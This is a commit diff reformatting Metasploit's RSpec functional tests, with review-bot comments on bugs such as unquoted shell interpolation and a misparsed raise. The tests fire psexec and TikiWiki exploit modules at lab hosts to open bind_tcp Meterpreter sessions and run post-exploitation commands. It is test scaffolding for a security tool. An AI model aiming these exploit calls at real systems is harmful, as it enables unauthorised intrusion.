Run rubocop --fix-layout test
parent
bf00619717
commit
29cc349649
|
@ -7,27 +7,85 @@ require 'fileutils'
|
||||||
require 'msf_matchers'
|
require 'msf_matchers'
|
||||||
require 'msf_test_case'
|
require 'msf_test_case'
|
||||||
|
|
||||||
|
|
||||||
module MsfTest
|
module MsfTest
|
||||||
|
include MsfTest::MsfMatchers
|
||||||
|
|
||||||
include MsfTest::MsfMatchers
|
## This spec exists to help us describe the behavior of msfconsole - TODO
|
||||||
|
|
||||||
|
describe "Msfconsole" do
|
||||||
|
###
|
||||||
|
# Setup!
|
||||||
|
###
|
||||||
|
|
||||||
## This spec exists to help us describe the behavior of msfconsole - TODO
|
before :all do
|
||||||
|
@working_directory = File.dirname(__FILE__)
|
||||||
|
|
||||||
|
## Static specs will make use of RC files here
|
||||||
|
@static_resource_directory = "#{@working_directory}/msftest/resource"
|
||||||
|
|
||||||
|
## Directories for the generated specs
|
||||||
|
@temp_directory = "#{@working_directory}/msfconsole_specs"
|
||||||
|
@temp_input_directory = "#{@temp_directory}/generated_rc"
|
||||||
|
|
||||||
|
## Where all output from the runs will go
|
||||||
|
@temp_output_directory = "#{@temp_directory}/output"
|
||||||
|
|
||||||
|
## Create a framework object
|
||||||
|
@framework = ::Msf::Simple::Framework.create
|
||||||
|
end
|
||||||
|
|
||||||
|
before :each do
|
||||||
|
end
|
||||||
|
|
||||||
|
after :each do
|
||||||
|
end
|
||||||
|
|
||||||
|
after :all do
|
||||||
|
## Clean up
|
||||||
|
# FileUtils.rm_rf(@temp_directory)
|
||||||
|
end
|
||||||
|
|
||||||
|
###
|
||||||
|
# Static Test cases!
|
||||||
|
###
|
||||||
|
|
||||||
|
it "should start and let us run help" do
|
||||||
|
data = start_console_and_run_rc("help", "#{@static_resource_directory}/help.rc")
|
||||||
|
|
||||||
|
success_strings = [
|
||||||
|
'help',
|
||||||
|
'Database Backend Commands',
|
||||||
|
'Core Commands'
|
||||||
|
]
|
||||||
|
failure_strings = [] | generic_failure_strings
|
||||||
|
failure_exception_strings = [] | generic_failure_exception_strings
|
||||||
|
|
||||||
|
data.should contain_all_successes(success_strings)
|
||||||
|
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
|
||||||
|
end
|
||||||
|
|
||||||
|
it "should generate a meterpreter session against a vulnerable win32 host" do
|
||||||
|
## Set input & output to something sane
|
||||||
|
input = Rex::Ui::Text::Input::Stdio.new
|
||||||
|
output = Rex::Ui::Text::Output::File.new("temp.output")
|
||||||
|
session = generate_x86_meterpreter_session(input, output)
|
||||||
|
|
||||||
|
session.should_not be_nil
|
||||||
|
|
||||||
|
if session
|
||||||
|
session.load_stdapi
|
||||||
|
session.run_cmd("help")
|
||||||
|
else
|
||||||
|
flunk "Error interacting with session"
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
###
|
||||||
|
# Dynamic Test Cases!!
|
||||||
|
###
|
||||||
|
|
||||||
describe "Msfconsole" do
|
|
||||||
|
|
||||||
###
|
|
||||||
# Setup!
|
|
||||||
###
|
|
||||||
|
|
||||||
before :all do
|
|
||||||
|
|
||||||
@working_directory = File.dirname(__FILE__)
|
@working_directory = File.dirname(__FILE__)
|
||||||
|
|
||||||
## Static specs will make use of RC files here
|
|
||||||
@static_resource_directory = "#{@working_directory}/msftest/resource"
|
|
||||||
|
|
||||||
## Directories for the generated specs
|
## Directories for the generated specs
|
||||||
@temp_directory = "#{@working_directory}/msfconsole_specs"
|
@temp_directory = "#{@working_directory}/msfconsole_specs"
|
||||||
@temp_input_directory = "#{@temp_directory}/generated_rc"
|
@temp_input_directory = "#{@temp_directory}/generated_rc"
|
||||||
|
@ -35,176 +93,112 @@ describe "Msfconsole" do
|
||||||
## Where all output from the runs will go
|
## Where all output from the runs will go
|
||||||
@temp_output_directory = "#{@temp_directory}/output"
|
@temp_output_directory = "#{@temp_directory}/output"
|
||||||
|
|
||||||
## Create a framework object
|
if File.directory? @temp_directory
|
||||||
@framework = ::Msf::Simple::Framework.create
|
FileUtils.rm_rf(@temp_directory)
|
||||||
end
|
|
||||||
|
|
||||||
before :each do
|
|
||||||
end
|
|
||||||
|
|
||||||
after :each do
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
after :all do
|
|
||||||
## Clean up
|
|
||||||
#FileUtils.rm_rf(@temp_directory)
|
|
||||||
end
|
|
||||||
|
|
||||||
###
|
|
||||||
# Static Test cases!
|
|
||||||
###
|
|
||||||
|
|
||||||
it "should start and let us run help" do
|
|
||||||
data = start_console_and_run_rc("help","#{@static_resource_directory}/help.rc")
|
|
||||||
|
|
||||||
success_strings = [ 'help',
|
|
||||||
'Database Backend Commands',
|
|
||||||
'Core Commands' ]
|
|
||||||
failure_strings = [] | generic_failure_strings
|
|
||||||
failure_exception_strings = [] | generic_failure_exception_strings
|
|
||||||
|
|
||||||
data.should contain_all_successes(success_strings)
|
|
||||||
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
|
|
||||||
end
|
|
||||||
|
|
||||||
it "should generate a meterpreter session against a vulnerable win32 host" do
|
|
||||||
## Set input & output to something sane
|
|
||||||
input = Rex::Ui::Text::Input::Stdio.new
|
|
||||||
output = Rex::Ui::Text::Output::File.new("temp.output")
|
|
||||||
session = generate_x86_meterpreter_session(input, output)
|
|
||||||
|
|
||||||
session.should_not be_nil
|
|
||||||
|
|
||||||
if session
|
|
||||||
session.load_stdapi
|
|
||||||
session.run_cmd("help")
|
|
||||||
else
|
|
||||||
flunk "Error interacting with session"
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
###
|
|
||||||
# Dynamic Test Cases!!
|
|
||||||
###
|
|
||||||
|
|
||||||
@working_directory = File.dirname(__FILE__)
|
Dir.mkdir(@temp_directory)
|
||||||
|
Dir.mkdir(@temp_input_directory)
|
||||||
|
Dir.mkdir(@temp_output_directory)
|
||||||
|
|
||||||
## Directories for the generated specs
|
Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
|
||||||
@temp_directory = "#{@working_directory}/msfconsole_specs"
|
## Parse this test case
|
||||||
@temp_input_directory = "#{@temp_directory}/generated_rc"
|
test_case = MsfTestCase.new(filename)
|
||||||
|
puts "Found #{test_case.name} in: #{filename}"
|
||||||
|
|
||||||
## Where all output from the runs will go
|
## Write the commands back to a temporary RC file
|
||||||
@temp_output_directory = "#{@temp_directory}/output"
|
puts "Writing #{@temp_input_directory}/#{test_case.name}.rc"
|
||||||
|
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands }
|
||||||
|
|
||||||
if File.directory? @temp_directory
|
## Create the rspec Test Case
|
||||||
FileUtils.rm_rf(@temp_directory)
|
it "should #{test_case.name}" do
|
||||||
end
|
## Gather the success / failure strings, and combine with the generics
|
||||||
|
success_strings = test_case.expected_successes
|
||||||
|
failure_strings = test_case.expected_failures | generic_failure_strings
|
||||||
|
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
|
||||||
|
|
||||||
Dir.mkdir(@temp_directory)
|
## run the commands
|
||||||
Dir.mkdir(@temp_input_directory)
|
data = start_console_and_run_rc(test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
|
||||||
Dir.mkdir(@temp_output_directory)
|
|
||||||
|
|
||||||
Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
|
|
||||||
|
|
||||||
## Parse this test case
|
|
||||||
test_case = MsfTestCase.new(filename)
|
|
||||||
puts "Found #{test_case.name} in: #{filename}"
|
|
||||||
|
|
||||||
## Write the commands back to a temporary RC file
|
## check the output
|
||||||
puts "Writing #{@temp_input_directory}/#{test_case.name}.rc"
|
data.should contain_all_successes(success_strings)
|
||||||
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands }
|
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
|
||||||
|
|
||||||
## Create the rspec Test Case
|
## Clean up
|
||||||
it "should #{test_case.name}" do
|
# File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
|
||||||
|
# File.delete("#{@temp_output_directory}/#{test_case.name}")
|
||||||
## Gather the success / failure strings, and combine with the generics
|
end
|
||||||
success_strings = test_case.expected_successes
|
|
||||||
failure_strings = test_case.expected_failures | generic_failure_strings
|
|
||||||
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
|
|
||||||
|
|
||||||
## run the commands
|
|
||||||
data = start_console_and_run_rc( test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
|
|
||||||
|
|
||||||
## check the output
|
|
||||||
data.should contain_all_successes(success_strings)
|
|
||||||
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
|
|
||||||
|
|
||||||
## Clean up
|
|
||||||
#File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
|
|
||||||
#File.delete("#{@temp_output_directory}/#{test_case.name}")
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
###
|
###
|
||||||
# Test case helpers:
|
# Test case helpers:
|
||||||
###
|
###
|
||||||
def generic_success_strings
|
def generic_success_strings
|
||||||
[]
|
[]
|
||||||
end
|
|
||||||
|
|
||||||
def generic_failure_strings
|
|
||||||
['fatal', 'fail', 'error', 'exception']
|
|
||||||
end
|
|
||||||
|
|
||||||
def generic_failure_exception_strings
|
|
||||||
[]
|
|
||||||
end
|
|
||||||
|
|
||||||
def start_console_and_run_rc(name,rc_file, database_file=false)
|
|
||||||
output_file = "#{@temp_output_directory}/#{name}"
|
|
||||||
|
|
||||||
if database_file
|
|
||||||
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
|
|
||||||
else
|
|
||||||
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
|
|
||||||
end
|
end
|
||||||
|
|
||||||
system("#{msfconsole_string}")
|
|
||||||
|
|
||||||
data = hlp_file_to_string("#{output_file}")
|
def generic_failure_strings
|
||||||
end
|
['fatal', 'fail', 'error', 'exception']
|
||||||
|
|
||||||
def generate_x86_meterpreter_session(input, output)
|
|
||||||
## Setup for win32
|
|
||||||
exploit_name = 'windows/smb/psexec'
|
|
||||||
payload_name = 'windows/meterpreter/bind_tcp'
|
|
||||||
|
|
||||||
## Fire it off against a known-vulnerable host
|
|
||||||
session = @framework.exploits.create(exploit_name).exploit_simple(
|
|
||||||
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
|
|
||||||
'Payload' => payload_name,
|
|
||||||
'LocalInput' => input,
|
|
||||||
'LocalOutput' => output)
|
|
||||||
|
|
||||||
## If a session came back, try to interact with it.
|
|
||||||
if session
|
|
||||||
return session
|
|
||||||
else
|
|
||||||
return nil
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
def generate_win64_meterpreter_session(input, output)
|
def generic_failure_exception_strings
|
||||||
raise "Not Implemented"
|
[]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def start_console_and_run_rc(name, rc_file, database_file = false)
|
||||||
def generate_java_meterpreter_session(input, output)
|
output_file = "#{@temp_output_directory}/#{name}"
|
||||||
raise "Not Implemented"
|
|
||||||
end
|
if database_file
|
||||||
|
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
|
||||||
def generate_php_meterpreter_session(input, output)
|
else
|
||||||
raise "Not Implemented"
|
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
|
||||||
end
|
end
|
||||||
|
|
||||||
def hlp_file_to_string(filename)
|
system("#{msfconsole_string}")
|
||||||
data = ""
|
|
||||||
f = File.open(filename, "r")
|
data = hlp_file_to_string("#{output_file}")
|
||||||
f.each_line do |line|
|
end
|
||||||
data += line
|
|
||||||
|
def generate_x86_meterpreter_session(input, output)
|
||||||
|
## Setup for win32
|
||||||
|
exploit_name = 'windows/smb/psexec'
|
||||||
|
payload_name = 'windows/meterpreter/bind_tcp'
|
||||||
|
|
||||||
|
## Fire it off against a known-vulnerable host
|
||||||
|
session = @framework.exploits.create(exploit_name).exploit_simple(
|
||||||
|
'Options' => { 'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => "" },
|
||||||
|
'Payload' => payload_name,
|
||||||
|
'LocalInput' => input,
|
||||||
|
'LocalOutput' => output
|
||||||
|
)
|
||||||
|
|
||||||
|
## If a session came back, try to interact with it.
|
||||||
|
if session
|
||||||
|
return session
|
||||||
|
else
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_win64_meterpreter_session(input, output)
|
||||||
|
raise "Not Implemented"
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_java_meterpreter_session(input, output)
|
||||||
|
raise "Not Implemented"
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_php_meterpreter_session(input, output)
|
||||||
|
raise "Not Implemented"
|
||||||
|
end
|
||||||
|
|
||||||
|
def hlp_file_to_string(filename)
|
||||||
|
data = ""
|
||||||
|
f = File.open(filename, "r")
|
||||||
|
f.each_line do |line|
|
||||||
|
data += line
|
||||||
|
end
|
||||||
|
return data
|
||||||
end
|
end
|
||||||
return data
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
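Review bot: `start_console_and_run_rc` still builds the msfconsole command as one interpolated string and hands it to `system`, so `name`, `rc_file` and `database_file` reach a shell unquoted. In the dynamic cases `name` is `test_case.name`, presumably parsed out of each `*.msftest` file, so a name containing spaces or shell metacharacters changes the command that runs. Passing the arguments as a list avoids the shell: `system('ruby', "#{@working_directory}/../../../msfconsole", '-o', output_file, '-r', rc_file)`, with `'-y', database_file` appended when it is set. The return value of `system` is also ignored, so a console that fails to start only shows up later as a missing output file in `hlp_file_to_string`.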
|
@ -1,19 +1,15 @@
|
||||||
module MsfTest
|
module MsfTest
|
||||||
module JavaMeterpreterSpecs
|
module JavaMeterpreterSpecs
|
||||||
|
## This file is intended to be used in conjunction with a harness,
|
||||||
|
## such as meterpreter_win32_spec.rb
|
||||||
|
|
||||||
## This file is intended to be used in conjunction with a harness,
|
def self.included(base)
|
||||||
## such as meterpreter_win32_spec.rb
|
base.class_eval do
|
||||||
|
it "should not error when taking a screenshot" do
|
||||||
def self.included(base)
|
success_strings = [ 'Screenshot saved to' ]
|
||||||
base.class_eval do
|
hlp_run_command_check_output("screenshot", "screenshot", success_strings)
|
||||||
|
end
|
||||||
it "should not error when taking a screenshot" do
|
|
||||||
success_strings = [ 'Screenshot saved to' ]
|
|
||||||
hlp_run_command_check_output("screenshot","screenshot", success_strings)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -7,85 +7,80 @@ require 'meterpreter_spec_helper'
|
||||||
require 'meterpreter_specs'
|
require 'meterpreter_specs'
|
||||||
|
|
||||||
module MsfTest
|
module MsfTest
|
||||||
|
describe "JavaMeterpreter" do
|
||||||
|
# This include brings in all the spec helper methods
|
||||||
|
include MsfTest::MeterpreterSpecHelper
|
||||||
|
|
||||||
describe "JavaMeterpreter" do
|
# This include brings in all the specs that are generic across the
|
||||||
|
# meterpreter platforms
|
||||||
# This include brings in all the spec helper methods
|
include MsfTest::MeterpreterSpecs
|
||||||
include MsfTest::MeterpreterSpecHelper
|
|
||||||
|
|
||||||
# This include brings in all the specs that are generic across the
|
|
||||||
# meterpreter platforms
|
|
||||||
include MsfTest::MeterpreterSpecs
|
|
||||||
|
|
||||||
# This include brings in all the specs that are specific to the java
|
|
||||||
# meterpreter
|
|
||||||
include MsfTest::JavaMeterpreterSpecs
|
|
||||||
|
|
||||||
before :all do
|
# This include brings in all the specs that are specific to the java
|
||||||
@verbose = true
|
# meterpreter
|
||||||
|
include MsfTest::JavaMeterpreterSpecs
|
||||||
@meterpreter_type = "java"
|
|
||||||
|
|
||||||
## Set up an outupt directory
|
|
||||||
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
|
||||||
|
|
||||||
if File.directory? @output_directory
|
before :all do
|
||||||
|
@verbose = true
|
||||||
|
|
||||||
|
@meterpreter_type = "java"
|
||||||
|
|
||||||
|
## Set up an outupt directory
|
||||||
|
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
||||||
|
|
||||||
|
if File.directory? @output_directory
|
||||||
|
FileUtils.rm_rf(@output_directory)
|
||||||
|
end
|
||||||
|
|
||||||
|
Dir.mkdir(@output_directory)
|
||||||
|
@default_file = "#{@output_directory}/default"
|
||||||
|
|
||||||
|
create_session_java
|
||||||
|
end
|
||||||
|
|
||||||
|
before :each do
|
||||||
|
end
|
||||||
|
|
||||||
|
after :each do
|
||||||
|
@session.init_ui(@input, @output)
|
||||||
|
end
|
||||||
|
|
||||||
|
after :all do
|
||||||
|
# FileUtils.rm_rf("*.jpeg")
|
||||||
|
# FileUtils.rm_rf("payload.jar")
|
||||||
FileUtils.rm_rf(@output_directory)
|
FileUtils.rm_rf(@output_directory)
|
||||||
end
|
end
|
||||||
|
|
||||||
Dir.mkdir(@output_directory)
|
def create_session_java
|
||||||
@default_file = "#{@output_directory}/default"
|
## Setup for win32
|
||||||
|
@framework = Msf::Simple::Framework.create
|
||||||
|
|
||||||
create_session_java
|
test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules')
|
||||||
end
|
@framework.modules.add_module_path(test_modules_path)
|
||||||
|
|
||||||
before :each do
|
@exploit_name = 'test/java_tester'
|
||||||
|
@payload_name = 'java/meterpreter/bind_tcp'
|
||||||
|
@input = Rex::Ui::Text::Input::Stdio.new
|
||||||
|
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
||||||
|
|
||||||
end
|
# Initialize the exploit instance
|
||||||
|
exploit = @framework.exploits.create(@exploit_name)
|
||||||
|
|
||||||
after :each do
|
## Fire it off against a known-vulnerable host
|
||||||
@session.init_ui(@input, @output)
|
@session = exploit.exploit_simple(
|
||||||
end
|
'Options' => {},
|
||||||
|
'Payload' => @payload_name,
|
||||||
after :all do
|
'LocalInput' => @input,
|
||||||
#FileUtils.rm_rf("*.jpeg")
|
'LocalOutput' => @output
|
||||||
#FileUtils.rm_rf("payload.jar")
|
)
|
||||||
FileUtils.rm_rf(@output_directory)
|
|
||||||
end
|
|
||||||
|
|
||||||
|
puts @session.inspect
|
||||||
def create_session_java
|
|
||||||
|
|
||||||
## Setup for win32
|
## If a session came back, try to interact with it.
|
||||||
@framework = Msf::Simple::Framework.create
|
if @session
|
||||||
|
@session.load_stdapi
|
||||||
test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules')
|
else
|
||||||
@framework.modules.add_module_path(test_modules_path)
|
raise Exception "Couldn't get a session!"
|
||||||
|
end
|
||||||
@exploit_name = 'test/java_tester'
|
|
||||||
@payload_name = 'java/meterpreter/bind_tcp'
|
|
||||||
@input = Rex::Ui::Text::Input::Stdio.new
|
|
||||||
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
|
||||||
|
|
||||||
# Initialize the exploit instance
|
|
||||||
exploit = @framework.exploits.create(@exploit_name)
|
|
||||||
|
|
||||||
## Fire it off against a known-vulnerable host
|
|
||||||
@session = exploit.exploit_simple(
|
|
||||||
'Options' => {},
|
|
||||||
'Payload' => @payload_name,
|
|
||||||
'LocalInput' => @input,
|
|
||||||
'LocalOutput' => @output)
|
|
||||||
|
|
||||||
puts @session.inspect
|
|
||||||
|
|
||||||
## If a session came back, try to interact with it.
|
|
||||||
if @session
|
|
||||||
@session.load_stdapi
|
|
||||||
else
|
|
||||||
raise Exception "Couldn't get a session!"
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
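Review bot: `raise Exception "Couldn't get a session!"` in `create_session_java` does not raise the intended error. Ruby parses `Exception "..."` as a call to a method named `Exception`, so a missing session fails with a NoMethodError and the message is lost. `raise "Couldn't get a session!"` keeps the message and avoids raising the `Exception` base class; the same line appears in `create_session_php` in the PHP meterpreter spec. The `## Setup for win32` comment at the top of `create_session_java` also looks left over from the Windows spec and could read `## Setup for java`.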
|
@ -7,76 +7,71 @@ require 'meterpreter_spec_helper'
|
||||||
require 'meterpreter_specs'
|
require 'meterpreter_specs'
|
||||||
|
|
||||||
module MsfTest
|
module MsfTest
|
||||||
|
describe "PhpMeterpreter" do
|
||||||
|
# This include brings in all the spec helper methods
|
||||||
|
include MsfTest::MeterpreterSpecHelper
|
||||||
|
|
||||||
describe "PhpMeterpreter" do
|
# This include brings in all the specs that are generic across the
|
||||||
|
# meterpreter platforms
|
||||||
# This include brings in all the spec helper methods
|
include MsfTest::MeterpreterSpecs
|
||||||
include MsfTest::MeterpreterSpecHelper
|
|
||||||
|
|
||||||
# This include brings in all the specs that are generic across the
|
|
||||||
# meterpreter platforms
|
|
||||||
include MsfTest::MeterpreterSpecs
|
|
||||||
|
|
||||||
before :all do
|
before :all do
|
||||||
@verbose = true
|
@verbose = true
|
||||||
|
|
||||||
@meterpreter_type = "php"
|
|
||||||
|
|
||||||
## Set up an outupt directory
|
|
||||||
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
|
||||||
|
|
||||||
if File.directory? @output_directory
|
@meterpreter_type = "php"
|
||||||
|
|
||||||
|
## Set up an outupt directory
|
||||||
|
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
||||||
|
|
||||||
|
if File.directory? @output_directory
|
||||||
|
FileUtils.rm_rf(@output_directory)
|
||||||
|
end
|
||||||
|
|
||||||
|
Dir.mkdir(@output_directory)
|
||||||
|
@default_file = "#{@output_directory}/default"
|
||||||
|
|
||||||
|
create_session_php
|
||||||
|
end
|
||||||
|
|
||||||
|
before :each do
|
||||||
|
end
|
||||||
|
|
||||||
|
after :each do
|
||||||
|
@session.init_ui(@input, @output)
|
||||||
|
end
|
||||||
|
|
||||||
|
after :all do
|
||||||
FileUtils.rm_rf(@output_directory)
|
FileUtils.rm_rf(@output_directory)
|
||||||
end
|
end
|
||||||
|
|
||||||
Dir.mkdir(@output_directory)
|
def create_session_php
|
||||||
@default_file = "#{@output_directory}/default"
|
## Setup for php
|
||||||
|
@framework = Msf::Simple::Framework.create
|
||||||
|
|
||||||
create_session_php
|
@exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
|
||||||
end
|
@payload_name = 'php/meterpreter/bind_tcp'
|
||||||
|
@input = Rex::Ui::Text::Input::Stdio.new
|
||||||
|
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
||||||
|
|
||||||
before :each do
|
# Initialize the exploit instance
|
||||||
|
exploit = @framework.exploits.create(@exploit_name)
|
||||||
|
|
||||||
end
|
## Fire it off against a known-vulnerable host
|
||||||
|
@session = exploit.exploit_simple(
|
||||||
|
'Options' => { 'RHOST' => "metasploitable" },
|
||||||
|
'Payload' => @payload_name,
|
||||||
|
'LocalInput' => @input,
|
||||||
|
'LocalOutput' => @output
|
||||||
|
)
|
||||||
|
|
||||||
after :each do
|
puts @session.inspect
|
||||||
@session.init_ui(@input, @output)
|
|
||||||
end
|
|
||||||
|
|
||||||
after :all do
|
|
||||||
FileUtils.rm_rf(@output_directory)
|
|
||||||
end
|
|
||||||
|
|
||||||
|
## If a session came back, try to interact with it.
|
||||||
def create_session_php
|
if @session
|
||||||
|
@session.load_stdapi
|
||||||
## Setup for php
|
else
|
||||||
@framework = Msf::Simple::Framework.create
|
raise Exception "Couldn't get a session!"
|
||||||
|
end
|
||||||
@exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
|
|
||||||
@payload_name = 'php/meterpreter/bind_tcp'
|
|
||||||
@input = Rex::Ui::Text::Input::Stdio.new
|
|
||||||
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
|
||||||
|
|
||||||
# Initialize the exploit instance
|
|
||||||
exploit = @framework.exploits.create(@exploit_name)
|
|
||||||
|
|
||||||
## Fire it off against a known-vulnerable host
|
|
||||||
@session = exploit.exploit_simple(
|
|
||||||
'Options' => {'RHOST' => "metasploitable"},
|
|
||||||
'Payload' => @payload_name,
|
|
||||||
'LocalInput' => @input,
|
|
||||||
'LocalOutput' => @output)
|
|
||||||
|
|
||||||
puts @session.inspect
|
|
||||||
|
|
||||||
## If a session came back, try to interact with it.
|
|
||||||
if @session
|
|
||||||
@session.load_stdapi
|
|
||||||
else
|
|
||||||
raise Exception "Couldn't get a session!"
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,58 +1,55 @@
|
||||||
module MsfTest
|
module MsfTest
|
||||||
module MeterpreterSpecHelper
|
module MeterpreterSpecHelper
|
||||||
|
def self.included(base)
|
||||||
def self.included(base)
|
base.class_eval do
|
||||||
base.class_eval do
|
def generic_failure_strings
|
||||||
|
['fail', 'error', 'exception']
|
||||||
def generic_failure_strings
|
|
||||||
['fail', 'error', 'exception']
|
|
||||||
end
|
|
||||||
|
|
||||||
def generic_failure_exception_strings
|
|
||||||
['nserror.dll', 'tiki-error.php','tiki-error_simple.php','tiki-rss_error.php'] ##ugh, this is dependent on the target
|
|
||||||
end
|
|
||||||
|
|
||||||
def hlp_run_command_check_output(name,command,success_strings=[],fail_strings=[], fail_exception_strings=[])
|
|
||||||
|
|
||||||
fail_strings = fail_strings | generic_failure_strings
|
|
||||||
fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
|
|
||||||
|
|
||||||
temp_command_file = "#{@output_directory}/#{name}"
|
|
||||||
|
|
||||||
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
|
|
||||||
@session.init_ui(@input, command_output)
|
|
||||||
|
|
||||||
command_output.print_line("meterpreter_functional_test_start")
|
|
||||||
|
|
||||||
if @verbose
|
|
||||||
puts "Running Command: " + command
|
|
||||||
end
|
end
|
||||||
|
|
||||||
@session.run_cmd(command)
|
def generic_failure_exception_strings
|
||||||
command_output.print_line("meterpreter_functional_test_end")
|
['nserror.dll', 'tiki-error.php', 'tiki-error_simple.php', 'tiki-rss_error.php'] # #ugh, this is dependent on the target
|
||||||
data = hlp_file_to_string(temp_command_file)
|
|
||||||
|
|
||||||
data.should contain_a_complete_test
|
|
||||||
data.should contain_all_successes
|
|
||||||
data.should contain_no_failures_except
|
|
||||||
end
|
|
||||||
|
|
||||||
def hlp_file_to_string(filename)
|
|
||||||
data = ""
|
|
||||||
f = File.open(filename, "r")
|
|
||||||
f.each_line do |line|
|
|
||||||
data += line
|
|
||||||
end
|
end
|
||||||
return data
|
|
||||||
end
|
def hlp_run_command_check_output(name, command, success_strings = [], fail_strings = [], fail_exception_strings = [])
|
||||||
|
fail_strings = fail_strings | generic_failure_strings
|
||||||
def hlp_string_to_file(string, filepath)
|
fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
|
||||||
# Create a new file and write to it
|
|
||||||
File.open(filepath, 'w') do |f2|
|
temp_command_file = "#{@output_directory}/#{name}"
|
||||||
|
|
||||||
|
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
|
||||||
|
@session.init_ui(@input, command_output)
|
||||||
|
|
||||||
|
command_output.print_line("meterpreter_functional_test_start")
|
||||||
|
|
||||||
|
if @verbose
|
||||||
|
puts "Running Command: " + command
|
||||||
|
end
|
||||||
|
|
||||||
|
@session.run_cmd(command)
|
||||||
|
command_output.print_line("meterpreter_functional_test_end")
|
||||||
|
data = hlp_file_to_string(temp_command_file)
|
||||||
|
|
||||||
|
data.should contain_a_complete_test
|
||||||
|
data.should contain_all_successes
|
||||||
|
data.should contain_no_failures_except
|
||||||
|
end
|
||||||
|
|
||||||
|
def hlp_file_to_string(filename)
|
||||||
|
data = ""
|
||||||
|
f = File.open(filename, "r")
|
||||||
|
f.each_line do |line|
|
||||||
|
data += line
|
||||||
|
end
|
||||||
|
return data
|
||||||
|
end
|
||||||
|
|
||||||
|
def hlp_string_to_file(string, filepath)
|
||||||
|
# Create a new file and write to it
|
||||||
|
File.open(filepath, 'w') do |f2|
|
||||||
f2.puts string
|
f2.puts string
|
||||||
end
|
end
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
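Review bot: In `hlp_run_command_check_output` the last two matchers are called with no arguments, as `data.should contain_all_successes` and `data.should contain_no_failures_except`, so the `success_strings`, `fail_strings` and `fail_exception_strings` prepared at the top of the method are never passed on. The msfconsole spec in this same commit calls them as `contain_all_successes(success_strings)` and `contain_no_failures_except(failure_strings, failure_exception_strings)`. The matcher definitions are not visible here, but unless they default to something useful these assertions check nothing. Suggested: `data.should contain_all_successes(success_strings)` and `data.should contain_no_failures_except(fail_strings, fail_exception_strings)`. `hlp_file_to_string` below it also opens the file without closing it; `File.read(filename)` returns the same string.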
|
@ -1,11 +1,10 @@
|
||||||
module MsfTest
|
module MsfTest
|
||||||
module MeterpreterSpecs
|
module MeterpreterSpecs
|
||||||
|
def self.included(base)
|
||||||
def self.included(base)
|
base.class_eval do
|
||||||
base.class_eval do
|
it "should not error when running each command" do
|
||||||
|
commands = [
|
||||||
it "should not error when running each command" do
|
"?",
|
||||||
commands = [ "?",
|
|
||||||
"background",
|
"background",
|
||||||
"bgkill",
|
"bgkill",
|
||||||
"bglist",
|
"bglist",
|
||||||
|
@ -15,9 +14,9 @@ module MeterpreterSpecs
|
||||||
"exit",
|
"exit",
|
||||||
"help",
|
"help",
|
||||||
"interact",
|
"interact",
|
||||||
#"irb",
|
# "irb",
|
||||||
"migrate",
|
"migrate",
|
||||||
#"quit",
|
# "quit",
|
||||||
"read",
|
